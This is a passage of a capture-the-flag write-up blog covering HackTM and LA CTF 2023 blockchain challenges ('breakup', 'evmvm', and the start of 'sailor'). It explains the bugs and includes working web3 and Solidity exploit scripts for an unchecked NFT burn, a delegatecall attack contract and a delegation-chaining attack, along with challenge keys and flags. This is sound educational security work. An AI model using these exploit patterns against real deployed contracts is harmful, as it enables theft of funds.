    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def transfer(_from, _to, _prikey):
    f = open('salty_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=SaltyPretzel, abi=abi)
    func_call = contract.functions.transfer(_to, 100 * 10 ** 18).buildTransaction({
        "from": _from,
        "nonce": w3.eth.get_transaction_count(_from),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })

    signed_tx = w3.eth.account.sign_transaction(func_call, _prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def delegate(_from, _to, _prikey):
    f = open('salty_abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=SaltyPretzel, abi=abi)
    func_call = contract.functions["delegate"](_to).buildTransaction({
        "from": _from,
        "nonce": w3.eth.get_transaction_count(_from),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })

    signed_tx = w3.eth.account.sign_transaction(func_call, _prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def send_ether(_from, _to, _prikey, amount):
    signed_txn = w3.eth.account.signTransaction(dict(
        nonce=w3.eth.getTransactionCount(_from),
        gasPrice = w3.eth.gasPrice, 
        gas = 1000000,
        to=_to,
        value = amount
        ),
        _prikey
    )
    result = w3.eth.send_raw_transaction(signed_txn.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

New_impl = deploy_new_impl()
init()

Attack = deploy_attack()

pk = hex(1).ljust(66, "0")
addr=w3.eth.account.from_key(pk).address
transfer(myAddr, addr, prikey)
send_ether(myAddr, addr, prikey, 120 * 10 ** 18)
delegate(addr, Attack, pk)

for i in range(1, 110):
    pk = hex(i).ljust(66, "0")
    nxt_pk = hex(i+1).ljust(66, "0")
    addr=w3.eth.account.from_key(pk).address
    nxt_addr=w3.eth.account.from_key(nxt_pk).address
    transfer(addr, nxt_addr, pk)
    send_ether(addr, nxt_addr, pk, 120 * 10 ** 18 - (10 ** 18 * i)) 
    delegate(nxt_addr, Attack, nxt_pk)

attack()
attack()

HackTM{m1ss10n_n0t_th4t_1mmut4ble_58fb67c04fd7fedc}

LA CTF 2023 - pwn(breakup, evmvm, sailor)

gss1 — Mon, 13 Feb 2023 22:43:45 +0900

I participated in LA CTF 2023.

There are two solidity and one solana.

I put all efforts into solving blockchain challenges for 2 days.

One chall was solved and my thought were very closely intended solution but not solved. :sad:

However, regardless of the fact that I solved only one chall, I learnd a lot through this opportunity!

I want to share what I learned.

breakup

https://github.com/uclaacm/lactf-archive/tree/master/2023/pwn/breakup

Analysis

Setup.sol

contract Setup {
    Friend public immutable friend;
    SomebodyYouUsedToKnow public immutable somebodyYouUsedToKnow;

    constructor() {
        friend = new Friend();
        somebodyYouUsedToKnow = new SomebodyYouUsedToKnow(friend);
    }

    function isSolved() external view returns (bool) {
        uint256 totalFriends = friend.balanceOf(address(somebodyYouUsedToKnow)); // 0?
        if (totalFriends == 0) {
            return true;
        }

        bytes memory you = "You";
        for (uint256 i = 0; i < totalFriends; i++) {
            bytes memory thisNameBytes = bytes(
                friend.friendNames(friend.tokenOfOwnerByIndex(address(somebodyYouUsedToKnow), i))
            );
            if (you.length == thisNameBytes.length && keccak256(you) == keccak256(thisNameBytes)) {
                return false;
            }
        }

        return true;
    }
}

If we meet condition totalFriends == 0, we could get flag.

totalFriends == 0 means that the balance of somebodyYouUsedToKnow in friend contract is zero.

Friend.sol

import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/token/ERC721/extensions/ERC721Enumerable.sol";
import "@openzeppelin/contracts/utils/Counters.sol";
contract Friend is ERC721Enumerable, Ownable {
    using Counters for Counters.Counter;

    Counters.Counter private _uuidCounter;
    mapping(uint256 => string) public friendNames;

    constructor() ERC721("Friend", "FRN") {}

    function safeMint(address to, string calldata name) public {
        _uuidCounter.increment();
        uint256 tokenId = _uuidCounter.current();
        _safeMint(to, tokenId);
        friendNames[tokenId] = name;
    }

    function burn(uint256 tokenId) public {
        _burn(tokenId);
        delete friendNames[tokenId];
    }
    ...
    ...

Friend inherited ERC721. Have you heard NFT? ERC721 is a implementation of NFT.

When we write contract by solidity, we usually use openzeppelin. It provides many interfaces, contracts, and utilities.

Root Cause

In friend.sol, burn does not check caller == token owner.

So I am not token owner but I can burn anything!

Exploit

somebodyYouUsedToKnow has only 1 token and tokenID is 1. (by using balanceOf(), owernOf())

import json
from web3 import Web3
from solc import compile_source
w3 = Web3(Web3.HTTPProvider("https://breakup.lac.tf/774b5c90-e954-45d0-947c-e7b50f9b841c"))

#Check Connection
t=w3.isConnected()
print(t)

# Get private key 
prikey =  '0xa8e07048b0ffaa5daf9ae90e472112398697b1d872ccc4b53e4f8f8bd97d0534'

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address

print(Public_Address) # 0x1A422f86D5381E84b01907ddF0E53fa9A6B2a3B3

myAddr = "0x5471F1Cd844dC1cE3c89e1Ab4468536ee46A9695"

def burn(friend, tokenId: int):
    f = open('friend.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=friend, abi=abi)
    func_call = contract.functions["burn"](tokenId).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })
    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)


SETUP = "0x28c6379a43411c26AbAB5b6F4171F17554e59fB3"
FRIEND = "0xb9f929C79A5120190f7715DA36c01d31d61b12eC"
SOMEBODY = "0xfBB4319f64f5460A0f7D68D2632136E4D1F6f5eD"

burn(FRIEND, 1)

how to get abi.txt

https://stackoverflow.com/questions/69269101/please-how-do-i-get-abi-of-my-token-after-deploying-on-bscmainet

lactf{s0m3_p30pl3_w4n7_t0_w4tch_th3_w0r1d_burn}

evmvm

https://github.com/uclaacm/lactf-archive/tree/master/2023/pwn/evmvm

Maybe you know there are many vm challenges in pwn and rev.

Analysis

Setup.sol

contract Setup {
    EVMVM public immutable metametaverse = new EVMVM();
    bool private solved = false;

    function solve() external {
        assert(msg.sender == address(metametaverse));
        solved = true;
    }

    function isSolved() external view returns (bool) {
        return solved;
    }
}

When metametaverse call solve(), we could get flag.

EVMMM.sol

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.18;

// YES I FINALLY GOT MY METAMETAVERSE TO WORK - Arc'blroth
contract EVMVM {
    uint[] private stack;

    // executes a single opcode on the metametaverse™
    // TODO(arc) implement the last few opcodes
    function enterTheMetametaverse(bytes32 opcode, bytes32 arg) external {
        assembly {
            // declare yul bindings for the stack
            // apparently you can only call yul functions from yul :sob:
            // https://ethereum.stackexchange.com/questions/126609/calling-functions-using-inline-assembly-yul

            function spush(data) {
                let index := sload(0x00)
                let stackSlot := 0x00
                sstore(add(keccak256(stackSlot, 0x20), index), data)
                sstore(0x00, add(index, 1))
            }

            function spop() -> out {
                let index := sub(sload(0x00), 1)
                let stackSlot := 0x00
                out := sload(add(keccak256(stackSlot, 0x20), index))
                sstore(add(keccak256(stackSlot, 0x20), index), 0) // zero out the popped memory
                sstore(0x00, index)
            }

            // opcode reference: https://www.evm.codes/?fork=merge
            switch opcode
                case 0x00 { // STOP
                    // lmfao you literally just wasted gas
                }
                case 0x01 { // ADD
                    spush(add(spop(), spop()))
                }
                case 0x02 { // MUL
                    spush(mul(spop(), spop()))
                }
                case 0x03 { // SUB
                    spush(sub(spop(), spop()))
                }
                case 0x04 { // DIV
                    spush(div(spop(), spop()))
                }
                case 0x05 { // SDIV
                    spush(sdiv(spop(), spop()))
                }
                case 0x06 { // MOD
                    spush(mod(spop(), spop()))
                }
                case 0x07 { // SMOD
                    spush(smod(spop(), spop()))
                }
                case 0x08 { // ADDMOD
                    spush(addmod(spop(), spop(), spop()))
                }
                case 0x09 { // MULMOD
                    spush(mulmod(spop(), spop(), spop()))
                }
                case 0x0A { // EXP
                    spush(exp(spop(), spop()))
                }
                case 0x0B { // SIGNEXTEND
                    spush(signextend(spop(), spop()))
                }
                case 0x10 { // LT
                    spush(lt(spop(), spop()))
                }
                case 0x11 { // GT
                    spush(gt(spop(), spop()))
                }
                case 0x12 { // SLT
                    spush(slt(spop(), spop()))
                }
                case 0x13 { // SGT
                    spush(sgt(spop(), spop()))
                }
                case 0x14 { // EQ
                    spush(eq(spop(), spop()))
                }
                case 0x15 { // ISZERO
                    spush(iszero(spop()))
                }
                case 0x16 { // AND
                    spush(and(spop(), spop()))
                }
                case 0x17 { // OR
                    spush(or(spop(), spop()))
                }
                case 0x18 { // XOR
                    spush(xor(spop(), spop()))
                }
                case 0x19 { // NOT
                    spush(not(spop()))
                }
                case 0x1A { // BYTE
                    spush(byte(spop(), spop()))
                }
                case 0x1B { // SHL
                    spush(shl(spop(), spop()))
                }
                case 0x1C { // SHR
                    spush(shr(spop(), spop()))
                }
                case 0x1D { // SAR
                    spush(sar(spop(), spop()))
                }
                case 0x20 { // SHA3
                    spush(keccak256(spop(), spop()))
                }
                case 0x30 { // ADDRESS
                    spush(address())
                }
                case 0x31 { // BALANCE
                    spush(balance(spop()))
                }
                case 0x32 { // ORIGIN
                    spush(origin())
                }
                case 0x33 { // CALLER
                    spush(caller())
                }
                case 0x34 { // CALLVALUE
                    spush(callvalue())
                }
                case 0x35 { // CALLDATALOAD
                    spush(calldataload(spop()))
                }
                case 0x36 { // CALLDATASIZE
                    spush(calldatasize())
                }
                case 0x37 { // CALLDATACOPY
                    calldatacopy(spop(), spop(), spop())
                }
                case 0x38 { // CODESIZE
                    spush(codesize())
                }
                case 0x3A { // GASPRICE
                    spush(gasprice())
                }
                case 0x3B { // EXTCODESIZE
                    spush(extcodesize(spop()))
                }
                case 0x3C { // EXTCODECOPY
                    extcodecopy(spop(), spop(), spop(), spop())
                }
                case 0x3D { // RETURNDATASIZE
                    spush(returndatasize())
                }
                case 0x3E { // RETURNDATACOPY
                    returndatacopy(spop(), spop(), spop())
                }
                case 0x3F { // EXTCODEHASH
                    spush(extcodehash(spop()))
                }
                case 0x40 { // BLOCKHASH
                    spush(blockhash(spop()))
                }
                case 0x41 { // COINBASE (sponsored opcode)
                    spush(coinbase())
                }
                case 0x42 { // TIMESTAMP
                    spush(timestamp())
                }
                case 0x43 { // NUMBER
                    spush(number())
                }
                case 0x44 { // PREVRANDAO
                    spush(difficulty())
                }
                case 0x45 { // GASLIMIT
                    spush(gaslimit())
                }
                case 0x46 { // CHAINID
                    spush(chainid())
                }
                case 0x47 { // SELBALANCE
                    spush(selfbalance())
                }
                case 0x48 { // BASEFEE
                    spush(basefee())
                }
                case 0x50 { // POP
                    pop(spop())
                }
                case 0x51 { // MLOAD
                    spush(mload(spop()))
                }
                case 0x52 { // MSTORE
                    mstore(spop(), spop())
                }
                case 0x53 { // MSTORE8
                    mstore8(spop(), spop())
                }
                case 0x54 { // SLOAD
                    spush(sload(spop()))
                }
                case 0x55 { // SSTORE
                    sstore(spop(), spop())
                }
                case 0x59 { // MSIZE
                    spush(msize())
                }
                case 0x5A { // GAS
                    spush(gas())
                }
                case 0x80 { // DUP1
                    let val := spop()
                    spush(val)
                    spush(val)
                }
                case 0x91 { // SWAP1
                    let a := spop()
                    let b := spop()
                    spush(a)
                    spush(b)
                }
                case 0xF0 { // CREATE
                    spush(create(spop(), spop(), spop()))
                }
                case 0xF1 { // CALL
                    spush(call(spop(), spop(), spop(), spop(), spop(), spop(), spop()))
                }
                case 0xF2 { // CALLCODE
                    spush(callcode(spop(), spop(), spop(), spop(), spop(), spop(), spop()))
                }
                case 0xF3 { // RETURN
                    return(spop(), spop())
                }
                case 0xF4 { // DELEGATECALL
                    spush(delegatecall(spop(), spop(), spop(), spop(), spop(), spop()))
                }
                case 0xF5 { // CREATE2
                    spush(create2(spop(), spop(), spop(), spop()))
                }
                case 0xFA { // STATICCALL
                    spush(staticcall(spop(), spop(), spop(), spop(), spop(), spop()))
                }
                case 0xFD { // REVERT
                    revert(spop(), spop())
                }
                case 0xFE { // INVALID
                    invalid()
                }
                case 0xFF { // SELFDESTRUCT
                    selfdestruct(spop())
                }
        }
    }

    fallback() payable external {
        revert("sus");
    }

    receive() payable external {
        revert("we are a cashless institution");
    }
}

I had know that we could use assembly, yul in solidity but not detailed.

https://docs.soliditylang.org/en/v0.8.17/assembly.html

https://docs.soliditylang.org/en/v0.8.17/yul.html#yul

enterTheMetametaverse() handle opcode and the storage of contract is the stack of vm.

By looking into spush() and spop(), we could know that storage slot 0 has stack size, storage slot more than 1 has stack item.

As mentioned, we should call solve() of Setup.sol.

Thus I thought that first I push arguemnts of call and call solve().

But there is a problem...

https://www.evm.codes/#f1?fork=merge

call(gas, address, value, argsOffset, argsSize, retOffset, retSize)

gas: amount of gas to send to the sub context to execute. The gas that is not used by the sub context is returned to this one.
address: the account which context to execute.
value: value in wei to send to the account.
argsOffset: byte offset in the memory in bytes, the calldata of the sub context.
argsSize: byte size to copy (size of the calldata).
retOffset: byte offset in the memory in bytes, where to store the return data of the sub context.
retSize: byte size to copy (size of the return data).

call() uses memory of evm because calldata is copied from caller's memory.

The structure of calldata is function signature (4bytes) || arg1 || padding(exists or not) || arg2 || ...

I wonder how function which does not have argument received argumnet.

It ignores arguments

Thus, I believe that I store function signature of solve() by using mstore(0x80, sig).

call(gas(), address of setup.sol, 0, 0x80, 0x4, 0, 0)

I tried this again and again... it failed.

Acutally, author commented enterTheMetametaverse() about in EVMVM.sol.

// executes a single opcode on the metametaverse™

// TODO(arc) implement the last few opcodes

It just executes single opcode!

That is, it means that every time evm enter this function, its memory is fresh!!!

The moment I realized this, my mental is breakdown. :laugh:

https://betterprogramming.pub/solidity-tutorial-all-about-memory-1e1696d71ee4

Under memory is reused and not initzialized like C, I tried solving this chall.

But it is wrong.

Do you know answer of following quiz?

If we call quiz(1), what does storage variable 'x' store?

contract Quiz{
    uint public x;

    function quiz(uint select) public {
        if(select == 1) {
            assembly {
                mstore(0x80, 123456)
            }
            quiz(0);
        }
        else {
            assembly {
                let y := mload(0x80)
                sstore(0, y)
            }
        }
    }
}

The answer is 123456.

Next, If we call quiz2(External contract's addr, 1), what does storage variable 'x' store?

contract External{
    Quiz2 q2;
    
    constructor(address _quiz2) {
        q2 = Quiz2(_quiz2);
    }
    
    function reenter() public {
        q2.quiz2(address(0), 0);
    }
}

contract Quiz2{
    uint public x;

    function quiz2(address _external, uint select) public {
        if(select == 1) {
            assembly {
                mstore(0x80, 123456)
            }
            _external.call(abi.encodeWithSignature("reenter"));
        }
        else {
            assembly {
                let y := mload(0x80)
                sstore(0, y)
            }
        }
    }
}

The answer is 0.

https://docs.soliditylang.org/en/v0.8.17/control-structures.html#internal-function-calls

https://docs.soliditylang.org/en/v0.8.17/control-structures.html#external-function-calls

Being called "internal" simple jumps inside the EVM. This has the effect that the current memory is not cleared
Being called “externally”, using a message call and not directly via jumps.

To execute single opcode, we continuously do "external" call.

Though of mload(0x80, sig), 0x80 of memory address does not sustain sig unitl call(gas(), address of setup.sol, 0, 0x40, 0x4, 0, 0).

If function signature of calldata is not found in contract, fallback() would handle this problem.

According to what I've said as far, we could call fallback() because we cannot set function signature of calldata.

Therefore delegatecall will be answer!.

call vs delegatecall

delegatecall does not change context.

so msg.sender, storage is equal to previous context.

Let A, B, C be contract.

when A >(call) B >(call) C

In context of B, msg.sender is A.

In context of C, msg.sender is B.

when A >(call) B >(delegatecall) C

In context of B, msg.sender is A.

In context of C, msg.sender is A.

when A >(delegatecall) B >(call) C

In context of B, msg.sender is A's caller.

In context of C, msg.sender is A.

when A >(delegatecall) B >(delegatecall) C

In context of B, msg.sender is A's caller.

In context of C, msg.sender is A's caller.

Is it interesting?

when A >(delegatecall) B >(delegatecall) C >(call) D

In context of D, who is msg.sender?

Answer is A.

https://gist.github.com/kangsangsoo/fd73e98dbcb442a18a76f1f3a79b3134

Finally,

when A >(delegatecall) B >(delegatecall) C >(call) D >(call) E

In context of E, who is msg.sender?

Answer is D.

https://gist.github.com/kangsangsoo/0b66508f84a975f066c34cd594e40147

If you want to deep dive, https://noxx.substack.com/p/evm-deep-dives-the-path-to-shadowy-a5f

Return to subject,

We are approaching in.

EOA >(call) EVMVM >(call) SETUP.

But we can call not SETUP's solve() but SETUP's fallback().

In following sequence, we can call SETUP's solve() is true and msg.sender == EVMVM in solve() is true

EOA >(call) EVMVM >(delegatecall) MY CONTRACT >(call) SETUP

So MY CONTRACT must have fallback().

The fallback() must containe SETUP.solve().

It's about all.

Solve

This chall's category is still VM. So how to push and pop what I want is also important.

To do

https://www.evm.codes/#f4?fork=merge

delegatecall(gas, address, argsOffset, argsSize, retOffest, retSize)

gas: amount of gas to send to the sub context to execute. The gas that is not used by the sub context is returned to this one.
address: the account which code to execute.
argsOffset: byte offset in the memory in bytes, the calldata of the sub context.
argsSize: byte size to copy (size of the calldata).
retOffset: byte offset in the memory in bytes, where to store the return data of the sub context.
retSize: byte size to copy (size of the return data).

We construct delegatecall(gas(), MYCONTRACT's addr, 0, 0, 0, 0)

case 0xF4 { // DELEGATECALL
    spush(delegatecall(spop(), spop(), spop(), spop(), spop(), spop()))
}

As solidity calling convention, it follows left to right.

So in func(arg1(), arg2(), arg3()), arg1() , we can understand arg1() > arg2() > arg3() > func().

https://gist.github.com/kangsangsoo/83406acd8a1e3f0978a52bb03cc894e4

But, in assembly {} right to left. i.e. arg3() > arg2() > arg1() > func(). .. why?

https://gist.github.com/kangsangsoo/d6002f0ed37f9158e97e577d08f0c89e

I recommend remix debugger!

Because it uses stack,

(Top)

addr

gas

-------------------

(Bottom)

We have many many ether.

The environment of chall has chainid = 1. I set base number 1 by using chainid().

There are arithmetic opcodes so we can make any number.

case 0x01 { // ADD
    spush(add(spop(), spop()))
}
case 0x02 { // MUL
    spush(mul(spop(), spop()))
}
case 0x03 { // SUB
    spush(sub(spop(), spop()))
}

I think that author intended we use calldataload() because enterTheMetametaverse has arg whose type is bytes32.

function enterTheMetametaverse(bytes32 opcode, bytes32 arg) external {

case 0x35 { // CALLDATALOAD
    spush(calldataload(spop()))
}

As mentioned above, calldata's structure looks like

func signature(4-byte) || arg1 || padding(if arg1's length is not 32-byte) || arg2 || pading || ...

https://www.evm.codes/#35?fork=merge

calldataload(idx) returns calldata[idx:idx+32].

If we call calldataload(36), output is arg and it is pushed top of stack.

The size of storage slot is 32-byte.

i.e. the size of stack item is 32-byte is equal arg's size.

If you do not understand following sequence, follow stey by step.

gas # push block.number to top of stack (big enough)

# to construct 36

# 36 = 4 * 9

# 36 = 2 * 2 * 3 * 3

chainid() # 1

add() # 1 + 1 =2

dup() # 2 2

chainid() # 1

add() # 1 + 1= 2

add() # 1 + 2 = 3

dup() # 3 3

mul() # 3 * 3 = 9

mul() # 2 * 9 = 18

mul() # 2 * 18 = 36

calldataload() # calldataload(36)

# to construct 0, 0, 0, 0

chainid() # 1

sub() # 1 - 1 = 0, top of stack is zero

dup() # two zero

dup() # three zero

dup() # four zero

# finish setting

delegatecall()

Although return value of delegatecall() is 1, solved of Setup contract is still zero.

The problem is that the my_contract was created incorrectly.

Can you find my flaw?

my_contract.sol

contract Attack {
    address public setup;

    constructor(address _setup) {
        setup = _setup;
    }

    fallback() external {
        setup.call(abi.encodeWithSignature("solve()"));
    }
}

We enter in my_contract.sol by delegatecall() from EVMVM.sol

Therefore, storage is not changed and 'setup' variable is not Setup.sol address.

It is storage slot 0 of EVMVM.sol.

To avoid this problem, we hardcode setup address!

In my case, I use imuutable keyword. It is not stored storage.

imuutable

https://ethereum.stackexchange.com/questions/82240/what-is-the-immutable-keyword-in-solidity

my_contract.sol

contract Attack {
    address immutable public setup;

    constructor(address _setup) {
        setup = _setup;
    }

    fallback() external {
        setup.call(abi.encodeWithSignature("solve()"));
    }
}

solve.py

import json
from web3 import Web3
from solc import compile_source
from Crypto.Util.number import *
w3 = Web3(Web3.HTTPProvider("https://evmvm.lac.tf/f9c5c1f5-da4c-4937-8c6f-866f6ca2bb8d"))

#Check Connection
t=w3.isConnected()
print(t)

# Get env
prikey = '0x416f3a4385aa760711c66e58b5d1b107c5d32da84ee822822894db3338ce1fbb'
METAMETAVERSE= "0x59862b91B86915F63875Cb678919a4ea0f300cDF"
SETUP = "0xCbC0618109baEFc534e440D016F004c8f6Dee401"
MY_CONTRACT = ""

# Create a signer wallet
PA=w3.eth.account.from_key(prikey)
Public_Address=PA.address
myAddr = Public_Address


# if you want to debug
def view_stack():
    stack_size = bytes_to_long(w3.eth.get_storage_at(METAMETAVERSE, 0))

    print("stack size: " + hex(stack_size))
    for i in range(stack_size):
        res = w3.eth.get_storage_at(METAMETAVERSE, 0x290decd9548b62a8d60345a988386fc84ba6bc95484008f6362f93160ef3e563 + i)
        print(hex(i) + ": " + str(res))

def deploy_my_contract():
    f = open("attack_abi", "r"); contract_abi= f.read(); f.close()
    f = open("attack_bytecode", "r"); contract_bytecode= f.read(); f.close()

    contract = w3.eth.contract(abi=contract_abi, bytecode=contract_bytecode)
    transaction = contract.constructor(SETUP).buildTransaction(
        {
            "chainId": w3.eth.chain_id,
            "gasPrice": w3.eth.gas_price,
            "from": Public_Address,
            "nonce": w3.eth.get_transaction_count(Public_Address),
        }
    )
    sign_transaction = w3.eth.account.sign_transaction(transaction, private_key=prikey)
    print("Deploying Contract!")
    # Send the transaction
    transaction_hash = w3.eth.send_raw_transaction(sign_transaction.rawTransaction)
    # Wait for the transaction to be mined, and get the transaction receipt
    print("Waiting for transaction to finish...")
    transaction_receipt = w3.eth.wait_for_transaction_receipt(transaction_hash)
    print(transaction_receipt)
    print(f"Done! Contract deployed to {transaction_receipt.contractAddress}")
    return str(transaction_receipt.contractAddress)

def enterTheMetametaverse(EVMVM, opcode, arg):
    f = open('evmvm.abi', 'r')
    abi_txt = f.read()
    abi = json.loads(abi_txt)
    contract = w3.eth.contract(address=EVMVM, abi=abi)
    func_call = contract.functions["enterTheMetametaverse"](opcode, arg).buildTransaction({
        "from": myAddr,
        "nonce": w3.eth.get_transaction_count(myAddr),
        "gasPrice": w3.eth.gas_price,
        "value": 0,
        "chainId": w3.eth.chain_id
    })

    signed_tx = w3.eth.account.sign_transaction(func_call, prikey)
    result = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
    transaction_receipt = w3.eth.wait_for_transaction_receipt(result)
    print(transaction_receipt)

def push_chainid():
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\x46", b"\x00"*32)

def add_top():
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\x01", b"\x00"*32)

def sub_top():
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\x03", b"\x00"*32)

def dup_top():
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\x80", b"\x00"*32)

def mul_top():
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\x02", b"\x00"*32)

def push_gas():
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\x43", b"\x00"*32) # block number

def delegatecall():
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\xF4", b"\x00"*32)

def calldataload(arg):
    enterTheMetametaverse(METAMETAVERSE, b"\x00"*31 + b"\x35", arg)

push_gas()

push_chainid()
push_chainid()
add_top()
dup_top()
push_chainid()
push_chainid()
push_chainid()
add_top()
add_top()
dup_top()
mul_top()
mul_top()
mul_top()

my_contract_addr = deploy_my_contract()
my_contract_addr = long_to_bytes(int(my_contract_addr, 16))
calldataload(my_contract_addr.rjust(32, b"\x00"))

push_chainid()
push_chainid()
sub_top()
dup_top()
dup_top()
dup_top()

view_stack() # debug
delegatecall()
view_stack() # debug

lactf{yul_hav3_a_bad_t1me_0n_th3_m3tam3tavers3}

sailor

https://github.com/uclaacm/lactf-archive/tree/master/2023/pwn/sailor

I found a way to get a flag with twice function call.

Recent solana challs were made with sol-ctf-framework.
I had never solved a solana chall with python until I saw this problem.
So I did not know how to call twice. :sad:

Therefore I believed that author intended it is solved by only one function call. :laugh:
As a reuslt, I did not find solution...

Analysis

.
├── chall
│   ├── Cargo.lock
│   ├── Cargo.toml
│   └── src
│       └── lib.rs
├── server
│   ├── Cargo.lock
│   ├── Cargo.toml
│   └── src
│       └── main.rs
├── solve.py

├── Dockerfile
└── sailor.so

4 directories, 9 files

sailor.so is compile from chall.

main.rs

It contains setting environment of ctf framework.

https://github.com/otter-sec/sol-ctf-framework

What we have to is focusing on handle_connection().

fn handle_connection(socket: &mut TcpStream) -> Result<(), Box<dyn Error>> {
    let mut builder = ChallengeBuilder::try_from(socket.try_clone()?)?;

    let mut rng = StdRng::from_seed([42; 32]);

    // put program at a fixed pubkey to make anchor happy
    let prog = Keypair::generate(&mut rng);

    // load programs
    let solve_pubkey = builder.input_program()?;
    builder.builder.add_program(prog.pubkey(), "sailor.so");

First, it constructs ChalengeBuilder for challenge andit generate fixed program public key.

Then, it sets challenge environment by reading program.

"read" here means reading the compiled .so file.

    // make user
    let user = Keypair::new();
    let rich_boi = Keypair::new();
    let (vault, _) = Pubkey::find_program_address(&[b"vault"], &prog.pubkey());
    let (sailor_union, _) =
        Pubkey::find_program_address(&[b"union", rich_boi.pubkey().as_ref()], &prog.pubkey());

    writeln!(socket, "program: {}", prog.pubkey())?;
    writeln!(socket, "user: {}", user.pubkey())?;
    writeln!(socket, "vault: {}", vault)?;
    writeln!(socket, "sailor union: {}", sailor_union)?;
    writeln!(socket, "rich boi: {}", rich_boi.pubkey())?;
    writeln!(socket, "system program: {}", system_program::id())?;

Next, some accounts is created for challenge and is sent by writeln! for user.

Keypair::new() generate randomly public key.

https://docs.rs/solana-sdk/latest/solana_sdk/signer/keypair/struct.Keypair.html#method.new

Pubkey::find_program_address() is very important concept in Solana.

https://docs.rs/solana-program/latest/solana_program/pubkey/struct.Pubkey.html#method.find_program_address

    // add accounts and lamports
    const TARGET_AMT: u64 = 100_000_000;
    const INIT_BAL: u64 = 1337;
    const TOTAL_BAL: u64 = 1_000_000_000;
    const VAULT_BAL: u64 = 500_000_000;

    builder
        .builder
        .add_account_with_lamports(vault, system_program::id(), INIT_BAL)
        .add_account_with_lamports(rich_boi.pubkey(), system_program::id(), TOTAL_BAL)
        .add_account_with_lamports(user.pubkey(), system_program::id(), INIT_BAL);

    let mut challenge = builder.build();

lamport is similar to Ethereum's wei. 1 lamport = 0.000000001 SOL and they are consumed like gas.

So challenge initiallzes that

vault := 1337,

rich_boi := 1_000_000_000,

user := 1337

then, enviornment setting and initialization ends.

    let mut create_instruction = vec![190, 65, 164, 249, 61, 177, 154, 181];
    create_instruction.extend(CreateUnion { bal: VAULT_BAL }.try_to_vec()?);

    challenge.env.execute_as_transaction(
        &[Instruction::new_with_bytes(
            prog.pubkey(),
            &create_instruction,
            vec![
                AccountMeta::new(sailor_union, false),
                AccountMeta::new(rich_boi.pubkey(), true),
                AccountMeta::new(vault, false),
                AccountMeta::new_readonly(system_program::id(), false),
            ],
        )],
        &[&rich_boi],
    );

What is create_instruction?

It is similiar to function signature in Solidity.

https://solana.stackexchange.com/questions/3135/how-do-you-find-a-matching-idl-instruction-using-the-anchor-instruction-discrimi

https://solana.stackexchange.com/questions/5716/anchor-how-to-know-instruction-number-without-having-to-run-cargo-expand

sha256({namespace:method name)[:8].

The instruction is made of [function signature] + [args].

So Anchor handle program process by signature.

In one word, it just call create_union() in lib.rs.

    // run solve
    challenge.input_instruction(solve_pubkey, &[&user])?;

    // check solve
    let balance = challenge
        .env
        .get_account(user.pubkey())
        .ok_or("could not find user")?
        .lamports;
    writeln!(socket, "lamports: {:?}", balance)?;

    if balance > TARGET_AMT {
        let flag = fs::read_to_string("flag.txt")?;
        writeln!(
            socket,
            "You successfully exploited the working class and stole their union dues! Congratulations!\nFlag: {}",
            flag.trim()
        )?;
    } else {
        writeln!(socket, "That's not enough to get the flag!")?;
    }

Finally, it receive user inputs by input_instruction() and execute them.

https://github.com/otter-sec/sol-ctf-framework/blob/main/src/lib.rs#L109(to understand solve.py)

And if user's balance > TARGET_AMT, we could get flag!

lib.rs

In order to solve this chall, we would use functions in lib.rs

fn transfer<'a>(
    from: &AccountInfo<'a>,
    to: &AccountInfo<'a>,
    amt: u64,
    signers: &[&[&[u8]]],
) -> Result<()> {
    if from.lamports() >= amt {
        invoke_signed(
            &system_instruction::transfer(from.key, to.key, amt),
            &[from.clone(), to.clone()],
            signers,
        )?;
    }
    Ok(())
}

It implements transfer(from, to, amount).

#[program]
mod sailor {
    use super::*;    
    pub fn create_union(ctx: Context<CreateUnion>, bal: u64) -> Result<()> {
        msg!("creating union {}", bal);

        if ctx.accounts.authority.lamports() >= bal {
            transfer(&ctx.accounts.authority, &ctx.accounts.vault, bal, &[])?;
            // initial balance isn't available because I said so
            ctx.accounts.sailor_union.available_funds = 0;
            ctx.accounts.sailor_union.authority = ctx.accounts.authority.key();
            Ok(())
        } else {
            msg!(
                "insufficient funds, have {} but need {}",
                ctx.accounts.authority.lamports(),
                bal
            );
            Err(ProgramError::InsufficientFunds.into())
        }
    }

#[derive(Accounts)]
pub struct CreateUnion<'info> {
    #[account(
        init,
        payer = authority,
